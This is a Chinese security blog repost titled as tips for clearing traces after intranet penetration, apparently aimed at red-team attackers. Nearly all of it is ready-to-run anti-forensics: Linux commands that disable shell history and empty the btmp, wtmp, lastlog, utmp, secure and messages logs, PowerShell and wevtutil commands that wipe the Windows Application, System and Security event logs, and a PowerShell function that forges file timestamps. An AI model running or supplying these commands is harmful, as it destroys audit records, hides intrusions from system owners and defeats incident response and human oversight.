内网渗透一些痕迹清理小技巧

admin 2024年3月9日22:24:27评论11 views字数 1112阅读3分42秒阅读模式

Linux痕迹清理

登陆linux机器后不想让别人知道执行的命令:history

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

第一种方式:清空日志文件 清除登录系统失败的记录:

[root@centos]# echo > /var/log/btmp 
[root@centos]# lastb //查询不到登录失败信息

清除登录系统成功的记录:

[root@centos]# echo > /var/log/wtmp 
[root@centos]# last //查询不到登录成功的信息

清除相关日志信息:

清除用户最后一次登录时间:echo > /var/log/lastlog          #lastlog命令
清除当前登录用户的信息:echo > /var/log/utmp #使用w,who,users等命令
清除安全日志记录:cat /dev/null > /var/log/secure
清除系统日志记录:cat /dev/null > /var/log/message

Powershell-清除系统日志

前提目标是 system 权限

eventvwr
PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"
Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}

PowerShell对文件修改时间戳

Function edit_time($path){$date1 =Get-ChildItem | 
Select LastWriteTime|Get-Random;$date2 =Get-ChildItem |
Select LastWriteTime|Get-Random;$date3 =Get-ChildItem |
Select LastWriteTime|Get-Random;$(Get-Item $path).lastaccesstime=$date1.LastWriteTime;
$(Get-Item $path).creationtime=$date2.LastWriteTime ;
$(Get-Item $path).lastwritetime=$date3.LastWriteTime};
edit_time("C:UserssaulGoodmanDesktop工具包pass.txt")

原文始发于微信公众号(渗透攻击红队):内网渗透一些痕迹清理小技巧

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月9日22:24:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透一些痕迹清理小技巧http://cn-sec.com/archives/2562790.html

发表评论

匿名网友 填写信息